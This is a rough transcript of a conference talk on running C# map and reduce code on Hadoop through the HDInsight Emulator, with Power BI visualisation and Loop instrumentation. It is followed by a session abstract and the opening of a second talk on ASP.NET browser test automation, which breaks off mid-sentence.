when we actually come to do work, what we've got is a 64 megabyte chunk of file and the function that's going to be running on that file right next to each other on the same node. So it's very fast. That allows us to use commodity machines inside our compute clusters because you don't need a very powerful machine to actually just operate on a 64 megabyte chunk of a file. So that's that part. What happens then between the map and the reduce is what's called the Hadoop shuffle. So here we see on the top, we've got nodes 1 to 3 and they're doing all the map and they're outputting. So in the terms of actually in the terms of a word count, node 1 will be turning out the word the and the word and and the word when and so will map to and so will map and so will sorry so will node 2 and so will node 3. And what happens here is that during the Hadoop what we call the Hadoop shuffle, all of the output from node 1, so all of the words for example from node 1 will go to the first node in the bottom and all the words when will go to the second node on the bottom and all the other words will go to the third node. So what happens there is every output with the same key all goes to the same node. So the reducer is only working on output from the mappers with the same key. Which gives us as clue as to what's the fastest way to break an Hadoop cluster. Given that information, do you know what's the fastest way to, can you see what's the fastest way to break a Hadoop cluster? They all have the same key, exactly a universal key. So what happens there is if you've got a thousand nodes in your cluster and you've got a universal key, all of the work will go to one node and it will sit there working its little heart out and the other 999 will be sitting there going well we have got no work to do. So watch out for that kind of thing. When you're actually grouping on something in code make sure it actually as evenly as possible partitions the data that you're working with. Okay. Okay so now that we understand the problem that we're dealing with and the fact that MapReduce solves that problem and then the fact that Hadoop will lift all the problems that MapReduce brings with us off of our shoulders, how do we actually install it? Well the easiest way to install Hadoop on your machine, on your Windows development machine is to use the HD Insight Emulator and you will find the HD Insight Emulator in the web platform installer. So if you launch the web platform installer and then just search for HD Insight you will find this one hit here. If you do not find this hit when you're searching for it in the web platform installer it's probably because you are running a 32-bit version of your operating system. Okay you have to be running the 64-bit version of an operating system to install HD Insight Emulator. Now if you're not you won't get any kind of warning or any kind of error or something like that right you'll just search for it and it won't appear there and you will have no idea why as far as you're concerned it just won't be there. I'm not entirely sure why they do that and not give you any kind of clue but if you're seeing that symptom if you're searching for it and you're not seeing that then it's because you're running a 32-bit. Okay once you've found it you just hit on the add and hit the install button, click on the licenses it'll tell you here the prerequisites it will also add in anything that you require that you don't have on your machine in order for you to do that that will automatically be added in for you and then it'll install nicely and when it's finished it'll tell you what it's installed. If you've got the.NET framework and everything like that already installed then the only thing that it'll probably install here is the Hortonworks data platform for Windows that is basically Hadoop and the Microsoft HD Insight Emulator for Windows Azure. It'll also add three icons to your desktop one will be the Hadoop command line we'll have a look at that later the other one will be a page which will take you to the Hadoop name node and one which will take you to the jobs page which will let you view running jobs. It'll also install a whole load of services into your machine here and it will start them all so if you just have a look to make sure if you don't have HD Insight running and installed properly once you've got it installed the best thing to do is have a look at your local services and see if any of them or make sure all of them are running. Okay so how do you get your C-Sharp code running on HD Insight on Hadoop once you've got that installed on your machine. Alright so we've had enough of word count now we did not invent powerful computers and we did not invent Hadoop clusters so that we can count words okay that is already a solved problem. So what we're going to do is kind of change it up a bit and we'll have a look at a different kind of example. One we're going to pick is horse racing prediction right we're going to simulate prediction horse racing right and one of the ways that you can do it is that you can pick a whole load of attributes about the horse and the jockey together 20 or so or 200 or whatever kind of statistics you want and then you can reduce that down into one index okay so you can say well this what's this jockeys career win rate what's this jockey season win rate what's the horses season win rate what's the jockeys win rate on that horse what's the horses win rate at that ground what's the jockeys win rate at the ground all these kind of things and then we can reduce that down into one index and then see which index has got the highest value is the horse most likely to win right so that's what we're going to simulate. So let's do that now let's switch back here and have a look at the streaming. So what we're going to do and actually what I'll do first of all is give you a look what I've got is a bunch of data here so if I just open this up what we're going to look as you can see I've got absolutely no imagination whatsoever for horses and jockeys and course names I've just named them sorry I've just numbered them so what we've got is we're going to take an input that just says it gives you a horse and a jockey in the ground the race track that it's running at okay and that's what we're going to take into Hadoop and what we're going to end up with at the end is a bunch of horses names and their index their likelihood of winning okay so how are we going to achieve that. The first thing I'm going to show you how to get it running is the easiest way to get it running as far as you being a C-sharp or a.NET developer okay and getting your code running on Hadoop so it's a little bit awkward to get it running this way but it means that you have very little code to write outside of what you would write normally in fact none of the code that I'm going to show you is Hadoop specific okay at this stage so what we're going to use is an API that Hadoop provides called streaming so we're going to use the streaming API and to do that what we need is we need a solution and in our solution we need two console applications okay I've called one mapper and one reducer just so we can see which is which but that's not a naming convention you have to stick to you can call them whatever you like it's just going to be much easier for us to see what's doing what if I call them mapper and reducer so if we open our mapper first what we're going to do is you can see how this works is we just consume the command line okay so when we're using the streaming API what will happen is we will give Hadoop we'll point Hadoop at a file and we'll point Hadoop at map and reduce functions that we write and Hadoop will feed us one line from that file at a time or actually what it will do is once we're out on the nodes it will feed one line from the 64 megabyte chunk of that file that we've got to our mapper and we just consume it from the command line so as we can see here what we do first of all is we take that string that I showed you earlier in that file and we split it up on the on commas because it's a comma separated file we split it up into fields where we've got horse jockey and course and then what we do go away and then what we do is we create our list of stats that we want okay so we go down here now at the at the moment what I've got here is I just create a new random double alright and that's simulating the kind of work that we would do to find our stats so if the stats was what is the career win rate for this particular horse you'd go out and you'd find that information from a database or file or whatever okay now when I say you go out and find that from a database it's important that you do that work ahead of time okay and then download it onto a file that you can then put out onto the nodes as well the last thing you want to do is to have hadoop do all that hard work of splitting up the file making everything really optimized because you've got a 64 megabyte chunk of a file and the function that's going to run against it you don't want to do all that work and then call out from that node across the network to do some database look up or something like that alright so do all that precalculation stuff ahead of time and get that done in files on that machine that you can actually open from that machine okay that's the important thing but here we're just going to simulate that because we're not going to we're not going to actually do that work we're just going to simulate it here by returning some random double which would be you know he's won this horse is won three out of his last eight races that will return a double and then what we do is we just append that to the stats that we've got already comma separated that so what we've got if we had 20 or 200 or whatever many statistics we've got we just have here's the first statistic and then they're all comma separated and we've got that in a string and then what we do up here is once we get that string back we just write it out onto the command line tab separated sorry not the command line and out onto the console line so you can see we're just actually reading and writing to and from the console that's all we have to do alright now none of that code will be alien to use a C-sharp program it's all very simple none of that code contains anything that is Hadoop specific down in the reducer it's exactly the same thing okay the reducer is going Hadoop is going to feed your reducer algorithm again line at a time it's going to feed at one line of that output at a time and again we're going to split that line up into fields this time we're going to split it on tab because that's what with the map or output tab separated key value pair and we're going to separate our key and our value so here that's going to be the horse's name that key and the value is going to be that large string of doubles that we got from our statistics and what we want to do is we want to reduce that down into one index so if we reduce that down by basically just iterating over the statistics converting each of those doubles into an actual double because our strings at the minute remember and then summing them together and then what we do at the end is we output the key which is the horse's name and the index at the end so we've actually reduced that down into one index now what we're going to do now is we're going to build that and so I'm just going to I'm just going to build that here and while I'm doing that I'm going to show you open this up show you to not that this okay so there's two things about the about the build that we want to pay attention to here notice the platform target is 64 bit okay you must compile for 64 bit architecture to run on HD inside all right luckily this time you will actually get an error if you get it wrong and if you do this and you can path 32 bit and you push it up onto your HD inside your local HD inside emulator it will actually come back and say no this is a 32 bit this is a 32 bit application I can't run this so that's the first thing the second thing I'm going to show you is I've got a build event here which actually copies the executable out to a separate a separate directory and I'm going to show you why that is now because one of the benefits of not having one of the benefits of not having done anything in there which is hadoop specific really is that we can actually test our work on the on our local machine before we push it up into our hadoop cluster okay so there is a set of tools called the GNU command line tools for Windows and if you install that that gives you like a Linux some of the Linux command line tools that we're going to use okay now what we can do now having that as you can see what I did was I copied this out here so I've now got the CSV file I want plus my mapper and my reducer file just copied out here into this test directory if I open up the test directory what I can do is I can say well what I want to do is I want to cat not that I want to cat the horse file really why is that not working and there I am that will do why am I not in the test directory okay now I am right so thank you for that what we do now is we can cat the horse file and we can pipe the output of that into our mapper and then pipe the output from our mapper into our reducer like so and we can now actually test that okay and so that works so we have the ability because we're not using any hadoop specific code to actually test our map and reduce functionality on our local machine before we push it up to the cloud or whatever it is that we're going obviously if we've got a large file if you've got a terabyte file or a pdb file you're not going to pipe the whole thing in there that's not going to work but you can use the command tools to take that to take the head 100 first 100 lines or whatever so you can actually test it here so now that we've tested our algorithm what we need to do is we need to get it up onto our hadoop cluster so how we're going to do that is we're going to pop over here and open the hadoop command line like so and this gives us access to the hadoop command line so what we want to do now is actually get this running on hadoop so what we'll do is we'll say hadoop I want to use your file system and I want to make a directory and we'll call that demo in hadoop will create that for us and then we'll say hey hadoop I want to use your file system and I want to put a local file I want to put this horses file here up into demo dash in and what that's going to do is that's going to put that file up onto our cluster for us now what we need to do is we need to put our mapper and reducer up there so we'll create another file here another directory I should say so make directory this time we'll call it apps that's where we're going to keep our apps and we'll say I want to use a file system and I want to put a local file and we'll put our mapper we'll grab that and we'll put it into demo apps like so and then we'll do the same thing here fs put and we'll grab the reducer this time and we'll stick that onto demo apps as well now once we've got everything up onto hadoop we actually need to actually we need to launch the job and as I said before we were using the streaming API and in hadoop the streaming API is actually wrapped up in a jar file so what we actually need to do now is run a jar so we say hey hadoop I want to run a jar file and this jar lives in lib and it's called hadoop dash streaming dot jar okay now in rehearsals and when I'm giving this talk I only this is a complicated command line to get our job working and I only actually get it right about three times at five so let's see if I can let's see if today is a good day so first thing we want to do is we want to say I want to create a job right and I need to I need to show you some files because I've got a mapper reducer files so we use the dash files command and then what we do is we say hey the file that I want you to use lives on the HDFS file system and it lives in demo dash apps and it's called mapper dot xy I've also got another one it lives on the HDFS file store and it lives at demo dot no it doesn't dash apps and it's called reducer dot xy and that's going to tell hadoop to it needs to actually push out these files onto each of the nodes in the cluster the next thing we want to tell it is we need to tell it the name of the executable that will actually do the mapping okay so we say our mapper is called mapper dot xy and the same thing for a reducer we have to tell it that our reducer is called reducer dot xy once we've done that we have to say oh by the way the input that I want you to use is in demo dash in slash in and I want you to put the output results to demo dot out okay so let's say if I've managed to get this command line right keep your fingers crossed looks like it's going to start okay so I haven't hooked up to any of the feedback from hadoop so what the mapper is going to say at the minute is it's going to go from I've done none of the work to I've done all of the work okay just in a second so there's the maps finished 100% the reducer will now kick off it's going to be the same you're not going to get any feedback it'll sit there for saying I've done absolutely nothing and then it'll say I've done all the work when it's finished and then hadoop will tell us where it's put the output so if we just quickly have a look at that we can say hey hadoop I want to use your file system please tell me what you've got in demo out and the bit we're interested in there is the bit at the bottom that's that part dash with them five zeros that's actually got our output in it so we can say to hadoop again I want to use a file system this time I want to cat and demo dash out dot part okay and we're going then to see the output and we can see that's the same as the output that we saw when we were running it locally so we know our code is running perfectly well up on the cluster now that is the easiest way for you as C sharp developers to get code up onto hadoop all right you haven't actually had to write any code there which is anything to do with hadoop right that was just pure C sharp code but having to do all that command line work as a real faff right who enjoys working on the command line just one person two people all right so that's probably the way to go for you all right those of us who like I say I get that command wrong about two times out of five okay only get it right three times today was a good day excellent so what we want to know is is there is there another way of doing it and there is if we jump back here there is actually a map reduce SDK okay you can actually get it in from new get if you actually new get this thing here and Microsoft dot dot hadoop dot map reduce it will bring in a whole load of other dependencies now what that will allow you to do is kind of bypass all that nasty command line stuff but it does mean that you have to start working with some hadoop specific code now but it isn't too terrible to be honest when you're using the SDK you have to do three things okay so one of the three things that you have to do is you have to define a mapper class and the mapper class actually inherits from mapper base up here and you have to implement and you have to override a method called map and that map gets an input line just the same as consuming the console and this time what you get is a context so instead of writing out to the context instead of writing out to the console window at the end what you'll do is you'll write out to this context but apart from that you can see this algorithm here this algorithm is exactly the same as the code you wrote in your vanilla C sharp okay the only thing down here is this different is instead of writing out to the console you're writing out you're emitting onto this context and the next thing you need is a reducer and much the same way the reducer it inherits from a reducer combiner base it does pretty much the same thing you get the key just the same as before and you get a whole bunch of values except instead of coming in as a string this time they come in as an I innumerable of string which allows you to iterate over them and again you get a context but again you see this algorithm here is exactly the same as it was before so you don't have to do too much so having created your mapper and your reducer the last thing you have to do is you have to create the job okay now to create the job what you have to do with this SDK is we're going to create a new Hadoop configuration the two things that you need are but in minimum you can set an awful lot of other things but the two things you require is the minimum is the input path which we set in the command line you can see where these switches are just setting things we set in the command line and the output folder having done that we connect to our Hadoop cluster if you're just using the one on your local machine you can just do connect and you can use the default constructor if you're actually running this out on a live cluster out on the cloud or something like that you'll get a connection string a user ID and password you just use the constructor in which you pass those right that's the only difference between live and running it on your own machine all right other than that the code will be exactly the same and then you say I want to run a map reduce job I want to execute it please with this mapper and this reducer which we've already defined okay passing in the configuration that we set there all right now that is not that's not that's not very difficult to do okay although we're now having to start to write Hadoop specific stuff it's quite straightforward all we're really doing is inheriting from a particular class and overriding a method right these are things that you'll have done a hundred times before okay with a little bit of setup and for the job but what that enables us to do now is to actually run that just by hitting F5 from our from Visual Studio now you can see there it's also detecting a whole bunch of dependencies okay that's all detecting that for you all of these dependencies have to go up onto Hadoop where we actually in the command line version we had to do that dash files in list all the files that we needed to do the had to go up there the SDK is actually doing that for us now so it's gone through there it's found all of those files which have a dependency and it's pushing them up onto Hadoop for us and now it's running the mapper and reducer in the same way as I said there's I haven't hooked up any of the feedback so we're going to get none of the work followed by I've done all of the work so now that it's finished it tells us and where it's put the output to just the same as before and you can see this command at the bottom I left this command window open so you can see that that is pretty much there you can see that Hadoop using the jar and then you can see all of the things that it put in it's it's actually used the Hadoop streaming jar so it's gone through the same mechanism as we had but it's done all of the heavy lifting for us you can see actually all of the files and everything that had to go up there all right without the SDK we would have had to have done all of that ourselves but now we get all that for free just by using the SDK so that's the two ways of you getting your code up there on Hadoop you can either use the command line or you can use the SDK whichever you prefer okay let's pile back to our slides okay now that we've done that how do I use my visualise my results all right it's all very well doing all that kind of thing but you can see the output from that when I cut that file it was just a bunch of words and a bunch of numbers okay as a data scientist or as a big data engineer or somebody who wants to start writing code to run on Hadoop if you have to be an engineer or a data scientist to understand the output all right for your business people you've already failed okay you can't hand over to your boss just a CSV file says hey look horse six is the one all right so one of the ways that we can visualise that is by using Excel these days actually so what I'm going to do now is I'm going to drop back down here let's get a hold of this now if I open this so instead let's close that what I've got now is a whole bunch of crime so if you just quickly have a look at this we're going to pretend that this is the output now from from MapReduce I think we've seen how MapReduce works and we've seen how to write the code so I don't want to go around the Hadoop loop again so we're going to just pretend that this output here is the output from a MapReduce job and we want to see how can we actually visualise that now from Hadoop so what I'm going to do is to cheat slightly so I'm going to go across here to Hadoop I'm going to say to hey Hadoop I want to use your file system I want to make a directory let's call it crimes and out say again now okay let's go back go here let's pop this open maybe weren't on the Hadoop command line so Hadoop file system make directory crimes out that's more like it alright so if we grab this data file again this time we'll just put it up here so we'll say hey dooffs minus put this file oh really now you see I even did the chronicle example and still the demo gods have decided to smite me. The demo is going to crash that's very nice let's close that down and open that back up again documents presentation, IDC data right I have no idea what it was doing there but we'll grab this crimes file drop it there thank you very much I don't know why that was so difficult and we'll put it in crimes out okay so that actually that simulates the fact that we've actually run a map reduced job and we've got our output in crimes out so now if we go up here and we open up Excel we can open that up and now we can use some of the some of the tools that comes in the Power BI package if everybody heard of Power BI here everybody not heard of Power BI okay so there are a few people so Power BI is a kind of analysis max package that's been released for Excel 2003 and for Excel Office 365 okay allows you to do all kinds of clever stuff and I'm only going to demonstrate a couple of the things today so one of the things that we can do is we can use Power Query now and Power Query allows us to pull in data from amongst other things other sources and when we pop open this other sources one of the places we can now pull in data from is from an HDFS file system okay so that's basically Hadoop alright so let's click on that and Power Query says to you well hey where is your Hadoop server now in our particular case we are just running it on localhost so we can hit localhost and it says fine here is everything that I know about and so that's very good and what I'm just going to do is refresh this because sometimes it doesn't pick up the most recent changes and now if I just say what I actually want is deselect all I want to look at crimes and we hit that one and there's one it says happened then I don't actually believe that those are the most up to date versions okay so there's one at the top which one shall we pick okay so now what we've done there is we've pulled in that information from our HDFS server our HDFS file system now of course we don't have the first line being column headers okay because as you remember all of the reducers are actually creating this output so the reducer creates one line at a time okay now you could have a thousand reducers in your node in your HDFS sorry in your Hadoop cluster and so none of the reducers would know which one is going to be responsible for putting the header in so you don't get the header it's up to you to actually remember what the column headers are going to be in your output so now that we've pulled it into query editor what we can do here is we can actually start to put in some column names so that is clearly a date and this is going to be a city or a city a city this is going to be the country and now this is going to be a bunch of crimes and we'll just make these ones up we'll say this one is theft and we'll say this one is assault and we'll say this one is some drugs offence okay so power query allows us to create headings like that when we pull this in and when we're finished with that we can hit the apply and close and what it's going to do then is to pull that into Excel now once we've got it into Excel we can hit the insert button and one of the other things that comes with power BI is power map so if we hit on the map now and open this up takes a little while and it's not going to work because I do not have an internet connection unless I am still on I'm still on the Wi-Fi yes let's pretend I meant that and I didn't suddenly have a panic there as I opened it up so what happens is power map uses Bing maps okay and so you have to have an internet connection to get out to bring in the mapping information okay so what we do down here you can see the first thing it says is well what kind of geography are you trying to show now if it's clear to excel excel will work out so obviously we had a city and we had a country as well okay it's always good to include the country because we're using Bing maps and because it's it's Microsoft and because it's Bing maps it's very American centric so if you don't specify a country if you just specify a city for example and it can find that city in America all right it will choose the American one by default all right now I guess if you live in Norway that's not a huge problem okay if you live in the UK and we basically populated the US in the 1700s by kicking everybody they would didn't like out and send them across the Atlantic then that gives us a problem because they basically then went to America and renamed places in America from the places they came from so for me coming from coming from Scotland there are places called Dundee and Aberdeen in America and so if you do that if you can find a city in America it will choose that so always select a country as well but because I named these columns city and country power map knows that that is the geography if you've named it something different and from the naming convention power map can't actually work out which one it is it will allow you to select one it says look this is the actual geography and this is the kind of geography it is so I've named mine city and it says hey I think the column that you've named city is a city okay that works quite well so we hit the next button there it knows what we're doing and now we can actually start to view our data so let's have the assaults and the drugs and the thefts we can have all of those crimes here so let's get rid of that legend because we don't really care about that and let's make this map a little bit more interesting that's kind of better so that's one thing we can do straight away so now instead of just showing people a whole bunch of names and numbers and saying hey this is the output you can actually show them something like this which is kind of cool alright but what's even cooler is we can see here the column that we named date okay was actually if you remember from when I brought things in in power query was actually a date timestamp okay and so when power map actually sees that you've got a date timestamp and the date and times are contiguous it says hey do you know what I can make I can make a video of this for you okay if you take the date here and just drag that down into the time it says alright I will automatically make a video for you because these crimes happened at a time and without any effort whatsoever I can now click on this button and you can actually see the crimes happening and adding in real time from all of the cities okay now this is a much more powerful visualization than just saying hey here's a CSV file knock yourself out guys alright and the facilities in power BI allow us to do this kind of thing and an awful lot more it's a very powerful business intelligence visualization pack that's now available for excel the session isn't about power BI I'm just demonstrating these kind of things but as we are Microsoft developers and we're moving on to a dupe this is a kick starter for that you know this is a tool that you'll probably be using you know anyway excel is a tool you probably used anyway so it's now a great visualization tool for the work that we're doing in hadoop I'm not intending to speak about power BI any further than that as I said because the session is not about power BI so let's close that down and let's jump back to our slides so we've done visualization what about now what about how do I instrument our code alright so we might be used to insert instrumenting code so we can see how it's running in a live environment and that's fine what it's on a server okay but how are we going to do that kind of thing when we're running now we're running on a cluster okay so there are lots of tools out there to do that what I'm going to show you now is one from a company called Gibraltar software and they've got a product called loop now the reason that I'm showing you this is for everything that I'm going to show you now loop is totally free okay so you don't have to purchase anything to do what I'm going to show you now and that's why I'm demoing with that particular product so what we want to do now is actually let me just pull back this one and if we open this version here this is some code which is instrumented so once you've actually written your code and if we go in we can you can pull in the Gibraltar agent new get package okay and bring that and all of its dependencies into your code and what that allows you to start doing is to do things like write this out here okay at the start of the main when that job starts it says hey I want to start logging now now the fact that we are actually on a cluster with say a thousand nodes isn't a huge problem because loop is very well designed and what happens is if it needs to make any logs at all it logs it to a local file so it logs a local file system so each of those nodes will be recording their own file so it's really quick what you don't want to do is to have a product that's going to call out to a server across from your node as it's working okay because that will totally kill performance but here it's just writing local it's very very efficient so we use that start session here and that's going to start actually logging information for us and then later down later on we're going to start using things like this so we can actually log information so exceptions and when I say exceptions I don't mean exceptions which have actually caused coding exceptions I just mean exceptions to the file where you were expecting something and the format wasn't quite right you can log that out so you can you can find those ones later and then when we're finished we can use the end session there also of course what you can do is you can use loop to actually catch exceptions here I just throw one and three is the loneliest number and we catch all of the exceptions here and we use loops record exception functionality to actually have that exception recorded for us now all of that stuff is just happening locally as the job is going on so it's just being written to the local file system so it's nice and fast here at the end when our job is finished we're going to write we're going to we're going to call end session now when we're using it locally things that I'm talking about just now it's totally free you're going to be able to see that if it's in production what happens when you call in session is all of those nodes at the time that they're really finished their work will then call out to the server and it will push out that very what's the word I'm looking for optimized constrained you know zipped down file then it's going to move that out to the server okay at that point that's the only time where you actually have to page a brought software any money if you want to use their server to actually hold your information everything that I'm showing you now it's completely free of charge so what kind of information and can you actually pull out of that so if we open the loop viewer we've got our our Hadoop demo which is that piece of code which is actually run and here we can see all of the logs which have all of the things which have been logged while that job was was running so if we open our reducer here and have a look here's all of the things that it that it pushed out it said the total number of words was four all of that kind of thing is really useful if we close that down and we look at the mapper here you can see we've got an actual exception in there so if we open that up here we can see everything is the same we can see the actual exception we can click on that all right we can get the information and any of the actual exception information that was there where it was reported by what kind of exception that it was we can actually click on here and look at the exception itself and where which function it actually happened in okay we close this down now and then we we push forward on session details there we can see all kinds of things about the machine that actually generated this exception we can see it's it's os architecture the dotnet version it was running the culture it was running in when this started when it ended all that kind of stuff that you want to instrument okay can all be done just the same as you do now you can use this product for your own desktop and server software that you're writing now when you move your software that you've got up onto a dup you can continue to use this kind of instrumentation okay it's extremely powerful again everything that I've showed you right now is completely free it's only if you want to use Gibralt as servers that you actually have to pay them any money so let's close this down head back to our slides you can use it for any and distributed system basically it's a it's a dotnet instrumentation so basically if you've got any kind of cluster any kind of distributed architecture that's still running on dotnet you can use this product okay and it will because it's very well designed like that it will work in a performant manner because it's got the ability to write locally in a very compressed that was the word I was searching for before compressed manner and then push it out to the server when you're finished okay so for the benefit of the camera the question there was is loop can loop work with any other kinds of distributed architecture or is it just with Hadoop okay and the answer is anywhere that runs dotnet you can run loop okay so that is pretty much it and we've even got five minutes for questions so just to recap what I explained today this is a kick started to get you Microsoft developers up and running on Hadoop I actually explained what the problem was and the problem is one of input totally swamping completely swamping a single machine and we fix that by map reduce so we break our algorithm down divide and conquer we break our algorithm down into a map and reduce and we push that out onto a cluster but that gives us other problems okay because we need all that cluster management and we are then become responsible for that Hadoop comes along and as a framework does all that heavy lifting for us and now we're back to just concentrating on our code okay I then showed you how to get your C sharp code running you can use either the streaming API straight from the command line or you can use the Azure SDK once we've got our code running I then showed you how to use visualization okay the visualization tool that we used here was just Power BI in Excel because that's the one you're probably most familiar with using Excel's and visualization tool there are lots of other ones out there feel free to pick the one that that you want but remember when you're connecting to an Hadoop cluster and you're bringing that file down that file might be a gigabyte in size okay so you need something like power query and the power BI tools within Excel which can handle large file size with a very cool in memory system okay and then once we've finished with the visualization the last thing I showed you was how to instrument your code because that's important to dotnet developers but in developers as a whole you know what is my code actually doing on the cluster okay because I showed you that you can test it locally using the GNU tools for Windows you can test that locally but you're only probably going to take a head 100 and run it with 100 lines and it might run perfectly when you're using it with two or three terabytes up on the cloud you might run into problems okay well try finding those problem lines in the terabyte of code a terabyte of file that you're looking at okay when each of the nodes it's easy for each of the nodes to find because they're looking at a 64 megabyte slice that's where you want it to tell you about the broken lines right not to give you a terabyte of file and say hey find it yourself best of luck okay and so you want to instrument your code and I've shown you that one of the best tools for doing that is loop from Gibraltar software most importantly everything that I showed you is completely free okay just as an aside I don't actually work for Gibraltar software I don't get any money for this but you only actually have to pay them if you put it into production and that's everything that we covered so after that quick summary does anybody have any questions now for the last three minutes yes sir okay so the question there was does Hadoop do anything other than MapReduce and the question is yes and no okay which is a weird answer but this is how I'm going to explain it to you Hadoop is an environment it's a framework for running MapReduce jobs okay so anything that under the hood clever developers can compile down to a set of MapReduce jobs okay can run on Hadoop okay so if they abstract things away from you away from that so that they present an abstraction to you in a different abstraction but it's still MapReduce underneath then that can run on Hadoop so for example there are products like Hive for example that will that are actually an SQL abstraction over MapReduce so you get presented with something that looks like a bunch of relationally joined tables you actually communicate with those tables instead of writing C-sharp code you actually write Hive SQL which looks very similar to T-SQL and any other SQL you've ever written in your life before under the hood the very clever developers basically compare that down into a set of MapReduce jobs so the answer to the question is yes Hadoop can only do MapReduce however clever developers can make layers upon layers of abstraction that hide that stuff and there's a whole load of stuff out there that will run on Hadoop anybody else yes sir yeah okay so the question there is when we're creating nodes how do we do that is do do we have to specify is it dynamic and the answer to that question is you're responsible for telling the name node about all of the nodes in the cluster now there's plans within Hadoop to do that to set up new nodes but there's also tools again going back to what this gentleman said previously about what else can you run on Hadoop and one of the tools out there is called Ambari and it's a provisioning system so it will help you provision those nodes and it will also monitor the health of the nodes and all the rest of them alright so it is your responsibility but there are great tools out there to make it super easy for you okay so I make it out of time now thanks very much for coming to the session and listening I hope you enjoyed it and you actually you know got that kick starter that can help you get out there and do your own Hadoop work I've been asked to remind you to please provide feedback on your way out by means of the cards it's really helpful for us speakers to get some feedback on what our performance is what you like what you didn't and also it's very very important for the conference that's why they asked me to remind you because that lets them decide whether or not they're going to bother inviting me back alright if anybody else has got any questions please just come up while I'm packing up and I'll answer them then or I'll be around for the rest of the conference okay thanks very much for coming along.
|
This session will provide a kickstarter for Hadoop on the Microsoft platform. It will take the audience from installation, through upload of data and analysis to visualisation of results via PowerBI. It's a must for any developer who is interested to find out how the data science/big data wave is going to impact them and what skills are needed work in this market.
|
10.5446/50804 (DOI)
|
Hello? Yeah. Okay. So let's get started. Hello, everyone. I hope you enjoyed the MDC so far. It's Friday before lunch, so I know it's a little bit harder to grab your attention, but I will try. Today I will talk about that application testing in the.NET space, and this talk is mainly based on the experience we have gathered at my company Tech Talk in the last few years, so all the results are also credited to my great colleagues. And yeah, let's jump into that. Actually, I have started the spec flow project a couple of years ago. How many of you know about spec flow? Okay, so almost everyone. Yeah, so spec flow seems to be a little bit silent now, but this is because right now we are mainly working on something called spec flow plus, which is a set of extensions, a useful tools like our test runner on top of spec flow. And even though that spec flow plus is a kind of commercial package, our goal with that is to use it as a base for continuing maintaining the spec flow project. So if you happen to purchase spec flow plus, then you actually get double bonus because you get some good tools and you also support the open source project with that. This talk will not be directly related to spec flow, but spec flow is related to test automation and test out and web applications, test automation in web applications is related to what I'm talking. So there is a connection between these two, even though this will be not as direct as you could be. So have you ever test automation or web automation through browser? Yeah, almost everyone. So you know this sometimes heated discussion that you have to, whether you should automate your applications through the browser or through the controller or something like that. And I think these discussions are good and I like to do that. Actually, we are doing that almost before every project. But I think there is no ultimate answer for that. So the thing I have realized that this is something like the heating system in your house. So you can turn it up and it will be nice warm. Probably you will pay a lot or you can turn it fully down, but then you will not pay anything, but you will be probably freezing after a while, especially here in Oslo. So this is also something similar with the web applications as well. So you can do test automation in the, through the browser, including JavaScript and everything. This will be costly. Coastly because there will be a higher implementation cost of your automation layer, but also there will be a higher maintenance cost related to this automation layer. But this is not necessarily bad. The question is whether the value that is provided by this automation is good enough to judge the costs. On the other hand, of course, in the full other extreme, this would be fully senseless because you are actually not testing what your application is doing. So this is a discussion and a decision that you have to make in every project. We are also doing this every time. Right now it's around 50-50, so half of our projects we are automating through the controller, half of them through the browser. However, what we are doing recently is that we are not making this decision fully uniform for the entire project. Maybe there are some components that make better sense to automate through the controller, even even more layers below, like a calculation part of your application. Maybe there are some parts which are related to user interaction, which makes more sense to automate through the browser. Actually, if you are phrasing and you are describing your test well and not including these technical details into your test descriptions, then this is absolutely possible and this is working quite well. So this is something that we are using quite often. While preparing for this talk, I was trying to grab some data from the Google Trends. Google Trends is a service where you can measure some kind of popularity of different search terms. In my case, I was collecting some tools and techniques related to browser automation. And this is showing that these trends in the last six years, I think. And what you can see is that these lines are waving. So something that was maybe popular five years ago. Now, it's not that much popular. Something that was not even existing a few years ago now becomes very popular. So this is also showing the dynamics, the changing environment of this browser automation business. The other thing that you can see from these trends is there are these blue and the purple line on the right-hand side, which is the web driver and the Fontome GS. And these two guys seem to have a quite deep curve up. So these two guys are something that we have to definitely watch for. Okay. So as I said, the dynamics and the environment, so the environment of this test automation and this entire browser automation topic is a little bit problematic because this is like a moving target. So it's very hard to find and make a decision which is last longer than a year. Actually, the web technology is quite in a rapid change. So with HTML5, with REST, JSON, whatever else, this is something new that we have to change as developers or test automators. We have to change our strategy to match that. Web applications are also changing. So, or the requirements for the web applications are also changing. I think you all know this. And also the web automation is changing. So a couple of years ago, it was very hard to get the browser automated. Now it's better and better. I guess everyone knows the web driver interface. Who knows the web driver interface? So what is that? Yeah. So web drive interface is now WC3 standard or at least the draft of the standard. So you can go to the, you can search for it and you will find the draft on the WC3 website. And this also shows that browser automation is becoming a topic that is well and well accepted. Or you can just think about the, the, this mini IDEs that are now we have in the browsers with the F12 and so on. So this is something that making our life better and better, but still very hard because it's still moving. In.NET, it's even worse. So unlike the, maybe some other platforms, in.NET we have this problem that the ASP.NET core, at least not the Vnext, but the current ASP.NET core is very tightly coupled to IAS. I think you, if you have tried to do more browser automation then you know that. So this doesn't look like a very big problem from the beginning, but actually if you want to make advanced and efficient web automation, then this becomes a problem. Because every testing that you have to do is a kind of out of process testing or out of processing. And this is causing some extra force that you have to take care of. We'll come back to this topic later. Fortunately ASP.NET Vnext is on the way. So this is a very good direction and I'm very happy that Microsoft did this step. So let's watch for that. Okay. So what will be the topics for today? Actually first I will discuss a little bit how you can do test first development through browser automation. I'm very much addicted to test first. I'm doing BDD quite much in the last years. And I start, I better and better love how test first works and how this can be integrated into the development cycle. However, doing test first with browser automation is not that trivial. So we'll see a little bit how this could be done. In the second part, we will discuss some issues that are coming from this outprop nature or this IS bound nature of the ASP.NET framework. I will show what kind of solutions we came to when we were trying to address these problems. Through this talk, I will try to mention all many different tools and resources that we have used or I find useful. At the end, there will be slides with all of them listed together with links. So you don't have to very well make notes about that. As a scope, I will pick a classic ASP.NET business application. Classic means that it's not a single-page application. This is the majority of the applications that at least the tech talk we are doing. And this is what I would like to focus in this talk. And of course, through some kind of functional test approach like BDD or ATDD or something like that. And at this point, I want to show how the application that we will implement looks like. Actually, it's a small Q&A application which is reminding very much to another Q&A site. But this is called spec overflow. I was playing with it as a spec flow test. But it works pretty similar. So you can ask a question and it appears in the website. Otherwise, it's just a simple ASP.NET application will be perfect for us to show the different options for that. Good. So let's jump into this test first part. And let's see how this can be done. If you do ATDD, then you probably have seen this circle or this flow hall test first first with acceptance test-driven development. How many of you have seen this picture already? Yeah, quite many. So the general flow is the following. You are just creating a failing end-to-end test, failing acceptance test, however you call it. And you start working on that until it gets green or gets 